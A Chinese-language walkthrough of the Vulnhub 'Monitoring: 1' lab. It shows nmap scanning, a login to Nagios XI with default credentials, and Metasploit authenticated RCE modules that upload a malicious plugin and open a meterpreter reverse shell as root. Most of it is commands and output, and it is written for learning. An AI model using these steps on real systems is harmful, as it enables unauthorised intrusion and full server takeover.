Vulnhub之Monitoring靶机详细测试过程
Monitoring
作者:jason_huawen
目标主机基本信息
名称:Monitoring: 1
地址:
https://www.vulnhub.com/entry/monitoring-1,555/
识别目标主机IP地址
目标主机无法从VirtualBox自动获取IP,需要首先参照本人另文解决该问题。
─(kali㉿kali)-[~/Vulnhub/Monitoring]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:27:23:f6 1 60 PCS Systemtechnik GmbH
192.168.56.229 08:00:27:44:6e:34 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.229
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Monitoring]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.229 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 08:27 EST
Nmap scan report for localhost (192.168.56.229)
Host is up (0.00022s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
| 256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_ 256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-09-08T17:59:00
|_Not valid after: 2030-09-06T17:59:00
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after: 2030-09-06T18:28:08
5667/tcp open tcpwrapped
MAC Address: 08:00:27:44:6E:34 (Oracle VirtualBox virtual NIC)
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.45 seconds
NMAP扫描结果表明目标主机有6个开放端口。
Get Access
初步浏览一下80端口和443端口可知80端口与443端口运行相同的服务。
查询互联网知道,nagios的默认管理员账号是nagiosadmin,密码是PASSW0RD
不过用这个密码不能成功,而是admin
用户名: nagiosadmin
密码:admin
用这个用户名和密码都可以分别登录/nagios, 以及nagiosxi
┌──(kali㉿kali)-[~/Vulnhub/Monitoring]
└─$ searchsploit nagios
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Nagios 3.0.6 - 'statuswml.cgi' Arbitrary Shell Command Injection | cgi/remote/33051.txt
Nagios 3.2.3 - 'expand' Cross-Site Scripting | multiple/remote/35818.txt
Nagios 4.2.2 - Local Privilege Escalation | linux/local/40774.sh
Nagios < 4.2.2 - Arbitrary Code Execution | linux/remote/40920.py
Nagios < 4.2.4 - Local Privilege Escalation | linux/local/40921.sh
Nagios Core 4.4.1 - Denial of Service | linux/dos/45082.txt
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities | php/webapps/40252.txt
Nagios Log Server 1.4.1 - Multiple Vulnerabilities | php/webapps/40250.txt
Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting | multiple/webapps/48772.txt
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting | multiple/webapps/49082.txt
Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities | php/webapps/40251.txt
Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities | php/webapps/40221.txt
Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow | linux/dos/30646.txt
Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read | linux/local/33387.txt
Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition | linux/local/33904.txt
Nagios Plugins check_ups - Local Buffer Overflow (PoC) | linux/dos/18278.txt
Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit) | linux/remote/24955.rb
Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities | linux/remote/34507.txt
Nagios XI - 'tfPassword' SQL Injection | php/remote/38827.txt
Nagios XI - 'users.php' SQL Injection | multiple/remote/34523.txt
Nagios XI - Authenticated Remote Command Execution (Metasploit) | linux/remote/48191.rb
Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities | linux/remote/34431.html
Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities | multiple/remote/36455.txt
Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root | php/webapps/44560.py
Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit) | linux/remote/44969.rb
Nagios XI 5.2.7 - Multiple Vulnerabilities | php/webapps/39899.txt
Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit) | linux/remote/47039.rb
Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation | linux/webapps/46221.py
Nagios XI 5.6.1 - SQL injection | php/webapps/46910.txt
Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution | php/webapps/48640.txt
Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation | php/webapps/47299.php
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting | php/webapps/48893.txt
Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection | php/webapps/48894.txt
Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated) | php/webapps/48959.py
Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection | php/webapps/48895.txt
Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting | php/webapps/49449.txt
Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) | php/webapps/49422.py
Nagios XI Chained - Remote Code Execution (Metasploit) | linux/remote/40067.rb
Nagios XI Network Monitor Graph Explorer Component - Command Injection (Metasploit) | unix/remote/23227.rb
Nagios3 - 'history.cgi' Host Command Execution (Metasploit) | linux/remote/24159.rb
Nagios3 - 'history.cgi' Remote Command Execution | multiple/remote/24084.py
Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit) | cgi/webapps/16908.rb
Nagios3 - 'statuswml.cgi' Command Injection (Metasploit) | unix/webapps/9861.rb
NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion | php/webapps/3919.txt
PHPNagios 1.2.0 - 'menu.php' Local File Inclusion | php/webapps/9611.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
我们需要知道nagios XI的版本,而登录nagios XI后知道版本为Nagios XI 5.6.0
同时查询互联网,知道5.6.0版本有远程执行漏洞:
https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce/
msf > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
msf exploit(nagios_xi_mibs_authenticated_rce) > show targets
...targets...
msf exploit(nagios_xi_mibs_authenticated_rce) > set TARGET < target-id >
msf exploit(nagios_xi_mibs_authenticated_rce) > show options
...show and set options...
msf exploit(nagios_xi_mibs_authenticated_rce) > exploit
msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This inclu
des signing the license agreement.
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
ing-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t
he local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux (x86/x64)
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set RHOSTS 192.168.56.229
RHOSTS => 192.168.56.229
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set SRVHOST 192.168.56.229
SRVHOST => 192.168.56.229
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[+] The target appears to be vulnerable.
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This inclu
des signing the license agreement.
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.229 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
ing-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 192.168.56.229 yes The local host or network interface to listen on. This must be an address on t
he local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux (x86/x64)
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This inclu
des signing the license agreement.
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.229 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
ing-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 192.168.56.206 yes The local host or network interface to listen on. This must be an address on t
he local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux (x86/x64)
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[+] The target appears to be vulnerable.
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Exploit completed, but no session was created.
但是很奇怪,竟然没有拿到shell,需要更换一个模块:
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > search nagios
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution
1 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 2020-10-20 excellent Yes Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
2 exploit/linux/http/nagios_xi_mibs_authenticated_rce 2020-10-20 excellent Yes Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection
3 exploit/linux/http/nagios_xi_autodiscovery_webshell 2021-07-15 excellent Yes Nagios XI Autodiscovery Webshell Upload
4 exploit/linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution
5 exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution
6 post/linux/gather/enum_nagios_xi 2018-04-17 normal No Nagios XI Enumeration
7 exploit/linux/http/nagios_xi_magpie_debug 2018-11-14 excellent Yes Nagios XI Magpie_debug.php Root Remote Code Execution
8 exploit/unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection
9 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce 2019-07-29 excellent Yes Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution
10 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 2020-12-19 excellent Yes Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection
11 auxiliary/scanner/http/nagios_xi_scanner normal No Nagios XI Scanner
12 exploit/unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution
13 exploit/unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution
Interact with a module by name or index. For example info 13, use 13 or use exploit/unix/webapp/nagios3_statuswml_ping
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This inclu
des signing the license agreement.
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
ing-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t
he local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux (x64)
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > exploit
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 192.168.56.229
RHOSTS => 192.168.56.229
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3020772 bytes) to 192.168.56.229
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.229:38400) at 2022-11-27 09:12:09 -0500
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.
成功拿到了shell.
meterpreter > shell
Process 17181 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 48K
drwx------ 7 root root 4.0K Sep 8 2020 .
drwxr-xr-x 23 root root 4.0K Sep 8 2020 ..
-rw------- 1 root root 407 Sep 8 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwxr-xr-x 6 root root 4.0K Sep 8 2020 .cpan
drwx------ 2 root root 4.0K Sep 8 2020 .gnupg
drwxr-xr-x 2 root root 4.0K Sep 8 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1.0K Sep 8 2020 .rnd
drwxr-xr-x 3 root root 4.0K Sep 8 2020 .subversion
-rw-r--r-- 1 root root 47 Sep 8 2020 proof.txt
drwxr-xr-x 2 root root 4.0K Sep 8 2020 scripts
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~# cat proof.txt
cat proof.txt
SunCSR.Team.3.af6d45da1f1181347b9e2139f23c6a5b
root@ubuntu:~#
直接拿到的是root shell.
经验教训
-
当时第一直觉是对的,nagios有默认的用户名和密码,但是用用户名和密码登录失败后就放弃了,而应该继续,用户名会保持默认的,但是密码可以用破解的方法,比如burpsuite。
-
虽然网上找到对应版本的Metasploit版本的漏洞利用模块,但是却无法成功获得shell,此时可以试下其他的相关模块。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
